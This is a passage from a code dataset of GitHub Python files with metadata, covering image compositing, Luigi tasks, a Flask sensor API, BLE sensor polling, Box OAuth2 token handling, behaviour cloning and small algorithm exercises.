'RUN' and not running_global:\n cmd_run(init_address, j)\n elif cmd == 'START' and not running_global:\n cmd_start()\n elif cmd == 'GET' and running_global:\n cmd_get(init_address, 
j)\n elif cmd == 'STOP' and running_global:\n cmd_stop()\n elif cmd == 'PERIOD' and not running_global:\n cmd_period(init_address, j)\n elif cmd == 'THRESH' and not running_global:\n cmd_thresh(init_address, j)\n else:\n logger.error('Wrong command')\n print('ERROR: Wrong command')\n\n except (KeyboardInterrupt, SystemExit):\n print(\"\\nClosed.\")\n finally:\n logger.info('Closing socket')\n sock.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Aetheya/ebpf_monitor_IoT","sub_path":"monitor_ebpf.py","file_name":"monitor_ebpf.py","file_ext":"py","file_size_in_byte":11467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16478406166","text":"import json\n\nHEADER = \"\\033[95m\"\nOKBLUE = \"\\033[94m\"\nOKCYAN = \"\\033[96m\"\nOKGREEN = \"\\033[92m\"\nWARNING = \"\\033[93m\"\nFAIL = \"\\033[91m\"\nENDC = \"\\033[0m\"\nBOLD = \"\\033[1m\"\nUNDERLINE = \"\\033[4m\"\n\nfrom api.number.tests import test as number\n\n# bss_response = bss()\nprint(json.dumps(number(), indent=2, sort_keys=True, default=str))\n# report = [ {\"bss\": bss_response}, ]\n# for one in report:\n# name = next(iter(one))\n# for api in one[name]:\n# endpoint = next(iter(api))\n# print(WARNING + name + ENDC, end =\" : \")\n# print(OKGREEN + endpoint + ENDC, end =\" : response code = \")\n# print(OKCYAN + str(api[endpoint][\"response\"][\"code\"]) + ENDC)\n\n\n# print(json.dumps(one[name], indent=2, sort_keys=True, default=str))\n\n# print(json.dumps(report, indent=2, sort_keys=True, default=str))\n","repo_name":"Taher-web-dev/galleon","sub_path":"backend/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42783881266","text":"#!/usr/bin/env python\n\nfrom chdrft.cmds import CmdsList\nfrom chdrft.main import app\nfrom chdrft.utils.cmdify import ActionHandler\nfrom chdrft.utils.misc import Attributize\nimport chdrft.utils.misc as cmisc\nimport glog\nimport chdrft.display.vispy_utils as vispy_utils\nfrom chdrft.display.vispy_utils import ImageData\nfrom chdrft.display.service import g_plot_service as oplt\n\nimport chdrft.display.utils as dsp_utils\nimport random\nfrom chdrft.struct.base import Box\nimport numpy as np\nimport cv2\nfrom chdrft.struct.geo import QuadTree\nimport skimage.transform\n\nglobal flags, cache\nflags = None\ncache = None\n\n\ndef args(parser):\n clist = CmdsList().add(test)\n ActionHandler.Prepare(parser, clist.lst, global_action=1)\n\n\ndef composeit(outfile, data):\n cx = ImageComposer()\n for entry in data:\n cx.add_img(cmisc.Attr(data=get_img(entry), box=entry.box))\n\n res = cx.render()\n if outfile:\n dsp_utils.save_image(outfile, res)\n else:\n dsp_utils.plot_img(res)\n\n\ndef get_boundaries(imgs):\n colorset = ('red', 'blue', 'green', 'yellow')\n\n def get_color(gridpos):\n if gridpos is None: return 'orange'\n return colorset[(gridpos[0] & 1) << 1 | (gridpos[1] & 1)]\n\n boundaries = []\n\n for img_data in imgs:\n boundaries.append(\n cmisc.Attr(\n polyline=img_data.box.to_double().expand(random.uniform(0, 1) * 0.001 +\n 1).poly_closed(),\n color=get_color(img_data.gridpos)\n )\n )\n return boundaries\n\n\ndef render_compose(in_imgs, extra_meshes=[], render_boundaries=0, as_grid=0, **kwargs):\n\n images = []\n for img_data in in_imgs:\n img_data = ImageData.Make(img_data)\n images.append(ImageData(\n img=img_data.img,\n gridpos=img_data.gridpos,\n box=img_data.box,\n ))\n\n if as_grid: 
images = ImageGrid(images=images, **kwargs).get_images()\n\n meshes = []\n meshes.extend(extra_meshes)\n if render_boundaries: meshes.append(cmisc.Attr(lines=get_boundaries(images)))\n\n rects = []\n for img_data in images:\n rects.append(img_data.box)\n vb = Box.Union(rects)\n meshes.append(cmisc.Attr(images=images, cmap='grays', clim=(0, 1)))\n\n vctx= oplt.plot(meshes, camera_viewbox=vb, typ='vispy', o=1).w.vctx\n enable_cycling(vctx)\n return vctx\n\n\n\n\ndef render_with_gridpos(imgs, outfile=None, spacing=1.1):\n\n cx = ImageComposer()\n for obj in imgs:\n h, w = obj.img.shape[:2]\n dim_xy = np.array((w, h))\n cx.add_img(\n cmisc.Attr(data=obj.img, box=Box(low=np.floor(obj.gridpos * dim_xy * spacing), dim=dim_xy))\n )\n\n if outfile:\n dsp_utils.save_image(outfile, cx.render(upscale=1))\n else:\n dsp_utils.plot_img(cx.render(upscale=1))\n\n\ndef overlay_images(a, b, dab, **kwargs):\n imx = [\n ImageData(img=a, pos=dab),\n ImageData(img=b, pos=np.zeros(2)),\n ]\n render_compose(imx, **kwargs)\n\n\nclass ImageGrid:\n\n def __init__(self, n=None, base_dim=None, images=None, spacing=0.1, nr=None, nc=None):\n if n is None: n = len(images)\n self.n = n\n\n def get_other(nx):\n return int(np.ceil(self.n / nx))\n\n if nc is not None: nr = get_other(nc)\n elif nr is not None: nc = get_other(nr)\n else:\n nr = int(self.n**0.5 + 1)\n nc = get_other(nr)\n\n self.nr = nr\n self.nc = nc\n self.data = []\n if images is not None:\n images = list(map(ImageData.Make, images))\n\n if base_dim is None:\n dims = [x.box.dim for x in images]\n base_dim = np.max(dims, axis=0)\n base_dim = np.array(base_dim)\n\n dim_spacing = base_dim * (1 + spacing)\n box = Box(low=(0, 0), dim=base_dim)\n\n for i in range(self.n):\n y = i // self.nc\n x = i % self.nc\n offset = dim_spacing * (x, y)\n self.data.append(ImageData(gridpos=(x, y), box=box+offset))\n self.dim_spacing = dim_spacing\n self.setup(images)\n\n def setup(self, images):\n if not images: return\n for i in range(len(images)):\n self.data[i].set_image(images[i].img)\n\n pos = self.data[i].pos\n if images[i].gridpos is not None:\n pos = self.dim_spacing * images[i].gridpos\n self.data[i].gridpos = images[i].gridpos\n self.data[i].stuff = images[i].stuff\n self.data[i].configure_box(images[i].box.zero_corner() + pos)\n\n def get_images(self):\n return list(self.data)\n\n\nclass ImageComposer:\n\n def __init__(self, imgs=[]):\n self.imgs = list(imgs)\n self.qtree = QuadTree(imgs)\n\n def add_img(self, img_data):\n self.imgs.append(img_data)\n self.qtree.add(img_data)\n\n def render(self, upscale=2):\n assert len(self.imgs) > 0\n boxes = list(img.box for img in self.imgs)\n pix_per_units = np.max([img.data.shape / img.box.shape for img in self.imgs], axis=0) * upscale\n\n self.rx = Box.Union(boxes)\n img_box = (self.rx * pix_per_units).to_int()\n self.pix_per_units = pix_per_units\n base_img = np.zeros(img_box.shape)\n for img in self.imgs:\n self.render_img(base_img, img)\n return base_img\n\n def render_img(self, base_img, img):\n new_box = ((img.box - self.rx.low) * self.pix_per_units).to_int()\n new_img = skimage.transform.resize(img.data, new_box.shape)\n base_img[new_box.window_yx] = new_img\n\n def render_box_fixed_dim(self, box, target_dim=None, upscale=1, **kwargs):\n u2px = self.imgs[0].u2px\n\n if target_dim is None:\n res = ImageData.Zero(box, u2px * upscale, **kwargs)\n else:\n target_box = Box.FromSize(target_dim)\n res = ImageData(img=target_box.make_zero_image(), box=target_box, **kwargs)\n\n elems = self.qtree.query_box(box, 
key=lambda x: x.box)\n for img in elems:\n ix = box.intersection(img.box)\n\n dest_box = box.change_rect_space(res.img_box, ix).to_int_round()\n src_box = img.box.change_rect_space(img.img_box, ix).to_int_round()\n if src_box.empty or dest_box.empty: continue\n simg = img.subimg(ix)\n print(ix, dest_box, simg.shape, dest_box.get_dim(res.yx), res.yx, res.box, res.img.shape)\n rescaled_img = skimage.transform.resize(simg, dest_box.get_dim(res.yx), order=0)\n res.subimg(ix, v=rescaled_img)\n return res\n\n\ndef render_grid(grid):\n vctx = grid.render(render_boundaries=1)\n enable_cycling(vctx)\n return vctx\n\n\ndef cycle_ev(d):\n\n imgs = [x.obj for x in d.cnds if isinstance(x.obj.obj, ImageData) and x.score == 0]\n imgs.sort(key=lambda x: x.ctxobj.vispy.transform.translate[2])\n\n n = len(imgs)\n for i in range(n):\n tsf = imgs[i].ctxobj.vispy.transform\n translate = tsf.translate\n translate[2] = 0.1 + (i + 1) % n #zindex\n imgs[i].ctxobj.vispy.transform = vispy_utils.transforms.STTransform(\n scale=tsf.scale, translate=translate\n )\n imgs[i].ctxobj.vispy.update()\n\n\ndef enable_cycling(vctx):\n vctx.click_sub.observers.clear()\n vctx.click_sub.subscribe(cycle_ev)\n\n\ndef main():\n ctx = Attributize()\n ActionHandler.Run(ctx)\n\n\napp()\n","repo_name":"unjambonakap/chdrft","sub_path":"display/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"30747102354","text":"import luigi\nimport os\n\n\nclass PrintWordTask(luigi.Task):\n path = luigi.Parameter()\n word = luigi.Parameter()\n\n def run(self):\n with open(self.path, 'w') as out_file:\n out_file.write(self.word)\n out_file.close()\n\n def output(self):\n return luigi.LocalTarget(self.path)\n\n def requires(self):\n return [\n MakeDirectory(path=os.path.dirname(self.path)),\n ]\n\n\nclass HelloWorldTask(luigi.Task):\n id = luigi.Parameter(default='test')\n\n def run(self):\n with open(self.input()[0].path, 'r') as hello_file:\n hello = hello_file.read()\n with open(self.input()[1].path, 'r') as world_file:\n world = world_file.read()\n with open(self.output().path, 'w') as output_file:\n content = '{} {}!'.format(hello, world)\n output_file.write(content)\n output_file.close()\n\n def requires(self):\n return [\n PrintWordTask(\n path='results/{}/hello.txt'.format(self.id),\n word='Hello',\n ),\n PrintWordTask(\n path='results/{}/world.txt'.format(self.id),\n word='World',\n ),\n ]\n\n def output(self):\n path = 'results/{}/hello_world.txt'.format(self.id)\n return luigi.LocalTarget(path)\n\n\nclass MakeDirectory(luigi.Task):\n path = luigi.Parameter()\n\n def output(self):\n return luigi.LocalTarget(self.path)\n\n def run(self):\n os.makedirs(self.path)\n\n\nif __name__ == '__main__':\n luigi.run()","repo_name":"elbertsoftware/SpringboardAIC","sub_path":"salinization/prototype/luigi-hello-world/hello_world_org.py","file_name":"hello_world_org.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"27585483483","text":"from datetime import datetime, timedelta\n\nfrom app import app, db\nfrom flask import render_template, jsonify, abort, request\nfrom .models import Config, Sensor, Measurement, Category, Location, pLast\n\n\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n u = Config.query.all()\n m = Measurement.query.order_by('-id').first()\n return render_template('index.html', configs=u, 
measure=m)\n\n\n@app.route('/sensor')\ndef sensor_list():\n sensors = Sensor.query.all()\n return render_template('sensor.html', sensors=sensors)\n\n\n\n\n@app.route('/measure/<sensor_id>/', methods=['get'])\n@app.route('/measure/<sensor_id>/<type>/', methods=['get'])\ndef get_measure(sensor_id, type='H'):\n delays = {'H' : 1, 'D': 24, 'W': 170, 'M': 5040, 'Y': 61000}\n sensor = Sensor.query.get(sensor_id)\n if sensor is None:\n abort(404)\n ms = Measurement.query.join(Sensor).filter(Sensor.id == sensor.id,\n Measurement.date > datetime.now() - timedelta(hours=delays[type])).order_by(Measurement.date.desc())\n return render_template('measure.html', sensor=sensor, measures=ms)\n\n\n# API DEFINITION\n\n# MEASURES\n# The API is open to all kinds of measurements\n# If it receives an unknown sensor, it will add the given sensor!\n# Integrates the measurement in the database\n# retrieves data\n@app.route('/api/v1/measure/<sensor_id>', methods=['POST'])\ndef add_measure(sensor_id):\n sensor = Sensor.query.get(sensor_id)\n if sensor is None: # Sensor is not known\n # Look for default category\n cat = Category.query.get(0)\n if cat is None:\n cat = Category('Default', 'Default')\n db.session.add(cat)\n db.session.commit()\n\n loc = Location.query.get(0)\n if loc is None:\n loc = Location('Default', 'Default')\n db.session.add(loc)\n db.session.commit()\n\n sensor = Sensor(sensor_id, 'Not Defined', cat, loc)\n db.session.add(sensor)\n if not request.json or not 'value' in request.json:\n abort(400)\n data = request.get_json()\n\n measuredvalue = float(data.get('value')) # @TODO: Check if value is float ...\n # retrieve the last two measurements to check if the value is changing\n lastm = Measurement.query.join(Sensor).filter(Sensor.id == sensor.id). \\\n order_by(Measurement.date.desc()).limit(2).all()\n tol = 0.005 # @TODO: Make it a config variable at some point\n if len(lastm) == 2 and ( abs(float(lastm[0].value) - float(lastm[1].value)) <= tol) and ( abs(float(lastm[0].value) - measuredvalue) <= tol) : # we already have two items in the list, so check if the last two are equal; if so, update the last one with a new timestamp\n lastm[0].date = datetime.now()\n m = lastm[0]\n else: # creates a measurement value\n m = Measurement(sensor, data.get('value'), datetime.now())\n db.session.add(m)\n\n db.session.commit()\n return jsonify(m.toJSON())\n\n\n# CONFIG\n@app.route('/api/v1/config', methods=['GET']) # Get all keys\n@app.route('/api/v1/config/<key>', methods=['GET']) # Get only specified\ndef get_config(key=None):\n \"\"\" try to load the value \"\"\"\n if not key: # query all if no value provided, happens when first route is called\n u = Config.query.all()\n else: # query given key otherwise\n q = Config.query.get(key)\n if q is None: # fails if key not found\n abort(404)\n else: # prepare for output otherwise\n u = [q]\n return jsonify( config = [ i.toJSON() for i in u ])\n\n\n@app.route('/api/v1/config', methods=['POST']) # Create a configuration, or update\ndef create_config():\n if not request.json or not 'key' in request.json or not 'value' in request.json:\n abort(400)\n data = request.get_json()\n q = Config(data.get('key'), data.get('value'))\n db.session.merge(q)\n db.session.commit()\n u = [q]\n return jsonify( config = [ i.toJSON() for i in u ])\n\n\n@app.route('/api/v1/config/<key>', methods=['PUT']) # Update a configuration\ndef update_config(key):\n q = Config.query.get(key)\n if q is None:\n abort(404)\n q.value = request.json.get('value', q.value)\n db.session.commit()\n u = [q]\n return jsonify( config = [ i.toJSON() for i in u 
])\n","repo_name":"mtauban/climabr","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73272351872","text":"import abc\nimport logging\nimport typing as ty\n\nfrom ..protocols.xiaomi import XiaomiPoller\nfrom .base import SENSOR_DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass XiaomiHumidityTemperature(XiaomiPoller, abc.ABC):\n SENSOR_CLASS: ty.Any = None\n # send data only if temperature or humidity is set\n REQUIRED_VALUES = ('temperature', 'humidity')\n\n @property\n def entities(self):\n return {\n SENSOR_DOMAIN: [\n {\n 'name': 'temperature',\n 'device_class': 'temperature',\n 'unit_of_measurement': '\\u00b0C',\n },\n {\n 'name': 'humidity',\n 'device_class': 'humidity',\n 'unit_of_measurement': '%',\n },\n {\n 'name': 'battery',\n 'device_class': 'battery',\n 'unit_of_measurement': '%',\n 'entity_category': 'diagnostic',\n },\n ],\n }\n\n async def read_and_send_data(self, publish_topic):\n battery = await self._read_with_timeout(self.BATTERY_CHAR)\n data_bytes = await self._stack.get()\n # clear queue\n while not self._stack.empty():\n self._stack.get_nowait()\n self._state = self.SENSOR_CLASS.from_data(data_bytes, battery)\n await self._notify_state(publish_topic)\n","repo_name":"devbis/ble2mqtt","sub_path":"ble2mqtt/devices/xiaomi_base.py","file_name":"xiaomi_base.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"60"} +{"seq_id":"31527215802","text":"def knapsack_01(items, capacity):\n n = len(items)\n\n\n # Create a 2D table to store the maximum weights\n table = [[0] * (capacity + 1) for _ in range(n + 1)]\n\n\n for i in range(1, n + 1):\n for w in range(1, capacity + 1):\n if items[i - 1][1] <= w:\n table[i][w] = max(table[i - 1][w], table[i - 1][w - items[i - 1][1]] + items[i - 1][1])\n else:\n table[i][w] = table[i - 1][w]\n\n\n # Retrieve the included items by backtracking through the table\n included_items = []\n i = n\n w = capacity\n while i > 0 and w > 0:\n if table[i][w] != table[i - 1][w]:\n included_items.append(items[i - 1])\n w -= items[i - 1][1]\n i -= 1\n\n\n return included_items[::-1]\n\n\n# Test the knapsack algorithm with the provided item weights and trolley capacity\nitems = [(\"Corn sack\", 12), (\"Hoe\", 5), (\"Oil tank\", 10), (\"Tires\", 16)]\ntrolley_capacity = 30\n\n\nincluded_items = knapsack_01(items, trolley_capacity)\n\n\nif included_items:\n total_weight = sum(item[1] for item in included_items)\n print(\"The item carried on the trolley is:\")\n for item in included_items:\n print(f\"Item: {item[0]}, Weight: {item[1]}kg\")\n print(f\"Total Weight: {total_weight}kg\")\nelse:\n print(\"No combination of items fits within the trolley's capacity.\")\n","repo_name":"adlynasn/MurderMansion","sub_path":".idea/MAIN/part6.py","file_name":"part6.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"69997628030","text":"import random as rand\n\n\nclass Node:\n # Constructor to initialize the node object\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkedList:\n # Function to initialize head\n def __init__(self):\n self.head = None\n\n # Function to insert a new node at the beginning\n def push(self, new_data):\n new_node = Node(new_data)\n new_node.next = self.head\n self.head = 
new_node\n\n # Utility function to print the LinkedList\n def printList(self):\n temp = self.head\n while temp:\n print(temp.data, end=\" \")\n temp = temp.next\n print(\"\\n\")\n\n def set_next(self, next):\n self.next = next\n\n # Recursive function to delete the linked list\n def delete_list(self):\n if self.head is None:\n return\n while self.head:\n print(self.head.data, end=\" \")\n del self.head.data\n self.head = self.head.next\n\n\n# Driver program to test above functions\nllist = LinkedList()\n\nrand_len = rand.randint(1, 100)\nfor i in range(rand_len):\n llist.push(rand.randint(1, 100))\n\n\nprint(\"\\nGiven Linked List\")\nllist.printList()\nprint(\"\\nDeleting Linked List\")\nllist.delete_list()\n\nprint(\"\\nNew Linked List [1,2,3,4]\")\nfor i in [1, 2, 3, 4]:\n llist.push(i)\nllist.printList()\n","repo_name":"DSAatUSU/ChatGPT-promises-and-pitfalls","sub_path":"humanCode/algorithms-data-structures/recursion/recursively-deletes-every-node-in-an-arbitrarily-long-linked.py","file_name":"recursively-deletes-every-node-in-an-arbitrarily-long-linked.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"71701298432","text":"# Write a Python program to print the following integers with zeros to the left of the specified width.\n#n1 = 3\n#w1 = 2\n#n2 = 123\n#w2 = 6\nif __name__ == \"__main__\":\n n1 = 3\n n2 = 123\n print(\"Number 1: {:02d}\".format(n1))\n print(\"Number 2: {:06d}\".format(n2))","repo_name":"v-t-9/PythonDataTypes-w3r","sub_path":"String/ex33.py","file_name":"ex33.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34793827996","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nfrom threading import Lock\nimport random\nimport string # pylint:disable=deprecated-module\n\nfrom six.moves.urllib.parse import urlencode, urlunsplit # pylint:disable=import-error,no-name-in-module\n\nfrom boxsdk.network.default_network import DefaultNetwork\nfrom boxsdk.config import API\nfrom boxsdk.exception import BoxOAuthException\n\n\nclass OAuth2(object):\n \"\"\"\n Responsible for handling OAuth2 for the Box API. Can authenticate and refresh tokens.\n \"\"\"\n\n def __init__(\n self,\n client_id,\n client_secret,\n store_tokens=None,\n box_device_id='0',\n box_device_name='',\n access_token=None,\n refresh_token=None,\n network_layer=None,\n refresh_lock=None,\n ):\n \"\"\"\n :param client_id:\n Box API key used for identifying the application the user is authenticating with.\n :type client_id:\n `unicode`\n :param client_secret:\n Box API secret used for making OAuth2 requests.\n :type client_secret:\n `unicode`\n :param store_tokens:\n Optional callback for getting access to tokens for storing them.\n :type store_tokens:\n `callable`\n :param box_device_id:\n Optional unique ID of this device. Used for applications that want to support device-pinning.\n :type box_device_id:\n `unicode`\n :param box_device_name:\n Optional human readable name for this device.\n :type box_device_name:\n `unicode`\n :param access_token:\n Access token to use for auth until it expires.\n :type access_token:\n `unicode`\n :param refresh_token:\n Refresh token to use for auth until it expires or is used.\n :type refresh_token:\n `unicode`\n :param network_layer:\n If specified, use it to make network requests. 
If not, the default network implementation will be used.\n :type network_layer:\n :class:`Network`\n :param refresh_lock:\n Lock used to synchronize token refresh. If not specified, then a :class:`threading.Lock` will be used.\n :type refresh_lock:\n Context Manager\n \"\"\"\n self._client_id = client_id\n self._client_secret = client_secret\n self._store_tokens_callback = store_tokens\n self._access_token = access_token\n self._refresh_token = refresh_token\n self._network_layer = network_layer if network_layer else DefaultNetwork()\n self._refresh_lock = refresh_lock or Lock()\n self._box_device_id = box_device_id\n self._box_device_name = box_device_name\n\n @property\n def access_token(self):\n \"\"\"\n Get the current access token.\n\n :return:\n current access token\n :rtype:\n `unicode`\n \"\"\"\n return self._access_token\n\n def get_authorization_url(self, redirect_url):\n \"\"\"\n Get the authorization url based on the client id and the redirect url, passed in\n\n :param redirect_url:\n An HTTPS URI or custom URL scheme where the response will be redirected. Optional if the redirect URI is\n registered with Box already.\n :type redirect_url:\n `unicode` or None\n :return:\n A tuple of the URL of Box’s authorization page and the CSRF token.\n This is the URL that your application should forward the user to in first leg of OAuth 2.\n :rtype:\n (`unicode`, `unicode`)\n \"\"\"\n csrf_token = self._get_state_csrf_token()\n # For the query string parameters, use a sequence of two-element\n # tuples, rather than a dictionary, in order to get a consistent and\n # predictable order of parameters in the output of `urlencode()`.\n params = [\n ('state', csrf_token),\n ('response_type', 'code'),\n ('client_id', self._client_id),\n ]\n if redirect_url:\n params.append(('redirect_uri', redirect_url))\n # `urlencode()` doesn't work with non-ASCII unicode characters, so\n # encode the parameters as ASCII bytes.\n params = [(key.encode('utf-8'), value.encode('utf-8')) for (key, value) in params]\n query_string = urlencode(params)\n return urlunsplit(('', '', API.OAUTH2_AUTHORIZE_URL, query_string, '')), csrf_token\n\n def authenticate(self, auth_code):\n \"\"\"\n Send token request and return the access_token, refresh_token tuple. 
The access token and refresh token will be\n stored by calling the `store_tokens` callback if provided in __init__.\n\n :param auth_code:\n An authorization code you retrieved in the first leg of OAuth 2.\n :type auth_code:\n `unicode` or None\n\n :return:\n (access_token, refresh_token)\n :rtype:\n (`unicode`, `unicode`)\n \"\"\"\n data = {\n 'grant_type': 'authorization_code',\n 'code': auth_code,\n 'client_id': self._client_id,\n 'client_secret': self._client_secret,\n }\n if self._box_device_id:\n data['box_device_id'] = self._box_device_id\n if self._box_device_name:\n data['box_device_name'] = self._box_device_name\n return self.send_token_request(data, access_token=None)\n\n def _refresh(self, access_token):\n data = {\n 'grant_type': 'refresh_token',\n 'refresh_token': self._refresh_token,\n 'client_id': self._client_id,\n 'client_secret': self._client_secret,\n }\n if self._box_device_id:\n data['box_device_id'] = self._box_device_id\n if self._box_device_name:\n data['box_device_name'] = self._box_device_name\n\n return self.send_token_request(data, access_token)\n\n def _get_tokens(self):\n \"\"\"\n Get the current access and refresh tokens.\n\n :return:\n Tuple containing the current access token and refresh token.\n :rtype:\n `tuple` of (`unicode`, `unicode`)\n \"\"\"\n return self._access_token, self._refresh_token\n\n def refresh(self, access_token_to_refresh):\n \"\"\"\n Refresh the access token and the refresh token and return the access_token, refresh_token tuple. The access\n token and refresh token will be stored by calling the `store_tokens` callback if provided in __init__.\n\n :param access_token_to_refresh:\n The expired access token, which needs to be refreshed.\n :type access_token_to_refresh:\n `unicode`\n \"\"\"\n with self._refresh_lock:\n access_token, refresh_token = self._get_tokens()\n # The lock here is for handling that case that multiple requests fail, due to access token expired, at the\n # same time to avoid multiple session renewals.\n if access_token_to_refresh == access_token:\n # If the active access token is the same as the token needs to be refreshed, we make the request to\n # refresh the token.\n return self._refresh(access_token_to_refresh)\n else:\n # If the active access token (self._access_token) is not the same as the token needs to be refreshed,\n # it means the expired token has already been refreshed. 
Simply return the current active tokens.\n return access_token, refresh_token\n\n @staticmethod\n def _get_state_csrf_token():\n \"\"\" Generate a random state CSRF token to be used in the authorization url.\n Example: box_csrf_token_Iijw9aU31sNdgiQu\n\n :return:\n The security token\n :rtype:\n `unicode`\n \"\"\"\n system_random = random.SystemRandom()\n ascii_alphabet = string.ascii_letters + string.digits\n ascii_len = len(ascii_alphabet)\n return 'box_csrf_token_' + ''.join(ascii_alphabet[int(system_random.random() * ascii_len)] for _ in range(16))\n\n def _store_tokens(self, access_token, refresh_token):\n if self._store_tokens_callback is not None:\n self._store_tokens_callback(access_token, refresh_token)\n\n def send_token_request(self, data, access_token, expect_refresh_token=True):\n \"\"\"\n Send the request to acquire or refresh an access token.\n\n :param data:\n Dictionary containing the request parameters as specified by the Box API.\n :type data:\n `dict`\n :param access_token:\n The current access token.\n :type access_token:\n `unicode` or None\n :return:\n The access token and refresh token.\n :rtype:\n (`unicode`, `unicode`)\n \"\"\"\n url = '{base_auth_url}/token'.format(base_auth_url=API.OAUTH2_API_URL)\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n network_response = self._network_layer.request(\n 'POST',\n url,\n data=data,\n headers=headers,\n access_token=access_token\n )\n if not network_response.ok:\n raise BoxOAuthException(network_response.status_code, network_response.content, url, 'POST')\n try:\n response = network_response.json()\n self._access_token = response['access_token']\n self._refresh_token = response.get('refresh_token', None)\n if self._refresh_token is None and expect_refresh_token:\n raise BoxOAuthException(network_response.status_code, network_response.content, url, 'POST')\n except (ValueError, KeyError):\n raise BoxOAuthException(network_response.status_code, network_response.content, url, 'POST')\n self._store_tokens(self._access_token, self._refresh_token)\n return self._access_token, self._refresh_token\n","repo_name":"LockScreen/Backend","sub_path":"venv/lib/python2.7/site-packages/boxsdk/auth/oauth2.py","file_name":"oauth2.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"11216013124","text":"import pickle\nimport tensorflow as tf\nimport numpy as np\nimport gym\nimport load_policy\nfrom tensorflow.contrib.layers import fully_connected\n\n\ndef train_bs():\n with open('expert_Data/Humanoid-v2.pkl', 'rb') as file:\n data = pickle.load(file)\n\n actions = data['actions']\n observations = data['observations']\n\n actions_shape = list(actions.shape)\n observations_shape = list(observations.shape)\n\n actions_shape[0] = None\n observations_shape[0] = None\n\n input = tf.placeholder(dtype=tf.float32,shape=observations_shape)\n label = tf.placeholder(dtype=tf.float32,shape=actions_shape)\n\n hidden1 = fully_connected(input, num_outputs=256, activation_fn=tf.nn.tanh)\n hidden2 = fully_connected(hidden1, num_outputs=128, activation_fn=tf.nn.tanh)\n hidden3 = fully_connected(hidden2, num_outputs=64, activation_fn=tf.nn.tanh)\n output = fully_connected(hidden3, num_outputs=actions_shape[-1], activation_fn=None)\n output = tf.expand_dims(output, axis=1)\n\n loss = tf.losses.mean_squared_error(labels=label, predictions=output)\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n def get_batch(index, batch_size = 
1024):\n\n np.random.shuffle(index)\n batchs= []\n for i in range(len(index)):\n batchs.append(i)\n if len(batchs) == batch_size:\n yield batchs\n batchs = []\n\n if len(batchs) != 0:\n yield batchs\n\n epoch = 60\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n index = np.arange(len(actions))\n for i in range(epoch):\n batch_loss =[]\n for batch_index in get_batch(index):\n batch_x, batch_y = observations[batch_index], actions[batch_index]\n _, loss_val = sess.run([optimizer, loss], feed_dict={input: batch_x, label:batch_y})\n batch_loss.append(loss_val)\n print('batch_loss is {}'.format(np.average(batch_loss)))\n\n policy = lambda x: sess.run(output, feed_dict={input: x})\n get_performence(policy)\n\ndef get_performence(policy):\n\n env = gym.make(args.envname)\n max_steps = args.max_timesteps or env.spec.timestep_limit\n\n returns = []\n observations= []\n actions= []\n for i in range(args.num_rollouts):\n print('iter', i)\n obs = env.reset()\n done = False\n totalr, total_bs = 0., 0.\n steps = 0\n while not done:\n action = policy(obs[None, :])\n observations.append(obs)\n actions.append(action)\n obs, r, done, _ = env.step(action)\n totalr += r\n steps += 1\n if steps % 100 == 0: print(\"%i/%i\" % (steps, max_steps))\n if steps >= max_steps:\n break\n returns.append(totalr)\n\n print('returns', returns)\n print('mean return', np.mean(returns))\n print('std of return', np.std(returns))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('expert_policy_file', type=str)\n parser.add_argument('envname', type=str)\n parser.add_argument('--render', action='store_true')\n parser.add_argument(\"--max_timesteps\", type=int)\n parser.add_argument('--num_rollouts', type=int, default=20,\n help='Number of expert roll outs')\n args = parser.parse_args()\n train_bs()\n\n\n\n\n\n\n\n","repo_name":"lianglizxc/RLhomework","sub_path":"hw1/behavior_clone.py","file_name":"behavior_clone.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8572856625","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 14 01:44:25 2017\r\n\r\n@author: akumar\r\n\r\nCode tested in Python3.6\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\n\r\n#class GenerateFeatures(object):\r\ndef generateFeatures(filename):\r\n file_train = pd.read_csv('{0}.csv'.format(filename), sep=',', header= 0 , dtype = {'Id':int ,'Text':str})\r\n file_train['Text'] = file_train['Text'].str.replace(u'![\\u4e00-\\u9fff,。/【】、v;‘:\\\"\\\",./[]-={}]+' , '')\r\n file_train['Text'] = file_train['Text'].str.replace('http(.*) ','')\r\n file_train['Text'] = file_train['Text'].str.replace('URL(.*) ', '')\r\n file_train['Text'] = 